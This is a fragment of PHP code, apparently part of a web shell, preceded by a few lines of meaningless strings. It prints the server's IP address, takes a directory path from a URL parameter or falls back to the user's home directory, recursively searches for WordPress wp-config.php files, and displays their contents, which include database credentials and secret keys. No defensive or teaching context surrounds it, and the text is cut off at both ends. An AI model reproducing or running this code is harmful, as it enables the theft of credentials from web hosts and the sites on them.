tasslihorec
sfaxoistadet
bintestcss
qslkfdjksqdjksqdj
posix function is not available
Please Input Path");
}
} else {
echo $_SERVER['SERVER_ADDR'];
echo "
";
if (isset($_GET["path"])) {
$home = $_GET["path"];
} else {
$arr = posix_getpwuid(posix_getuid());
$home = $arr["dir"];
}
}
/////////// Scanning directories & showing wp-config.php ////////////
$dirlist = getFileList($home, TRUE, 5); // changed from 2 to 3
foreach ($dirlist as $alldir) {
$wpconfig = $alldir . "wp-config.php";
if (file_exists($wpconfig)) {
echo "Found: $wpconfig
";
echo "
" . htmlspecialchars(file_get_contents($wpconfig)) . "